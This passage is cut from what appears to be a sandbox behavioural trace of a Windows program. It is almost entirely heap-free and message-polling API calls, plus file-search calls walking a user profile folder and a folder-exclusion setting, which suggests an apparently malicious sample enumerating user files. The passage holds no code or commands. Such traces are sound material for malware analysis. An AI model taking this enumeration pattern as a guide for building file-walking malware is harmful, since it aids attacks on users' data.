lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0157.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.076] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.076] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.076] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.077] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.077] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.077] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.077] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.077] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.077] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0157.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0157.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.078] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0157.078] PeekMessageW (in: lpMsg=0x87ec74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ec74) returned 0 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.079] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.079] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0157.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6f0 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d50 | out: hHeap=0x8a0000) returned 1 [0157.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d40 | out: hHeap=0x8a0000) returned 1 [0157.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x87e888 | out: lpFindFileData=0x87e888*(dwFileAttributes=0x8e2a78, ftCreationTime.dwLowDateTime=0x9ba6d8, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x85a028c, nFileSizeHigh=0x3caf, nFileSizeLow=0x0, dwReserved0=0x2020e1a, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d60 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0157.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d40 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d60 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6c0 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6d8 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee98 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ce0 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c88 | out: hHeap=0x8a0000) returned 1 [0157.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d00 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a48 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cd0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cf0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d48 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d78 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d18 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ca0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba678 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9bc8 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d00 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d10 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba6a8 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d20 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dc0 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c40 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c20 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c60 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c70 | out: hHeap=0x8a0000) returned 1 [0157.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c90 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e08 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5830 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9df0 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e68 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9dd8 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.082] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0157.082] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.082] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.082] FindNextFileW (in: hFindFile=0x90ad98, lpFindFileData=0x87eac8 | out: lpFindFileData=0x87eac8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9675d20, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc9675d20, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87ed94, dwReserved1=0x8a7560, cFileName="Contacts", cAlternateFileName="")) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d30 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9da8 | out: hHeap=0x8a0000) returned 1 [0157.082] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.083] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1c80 | out: hHeap=0x8a0000) returned 1 [0157.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cb0 | out: hHeap=0x8a0000) returned 1 [0157.083] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0157.083] CharUpperBuffW (in: 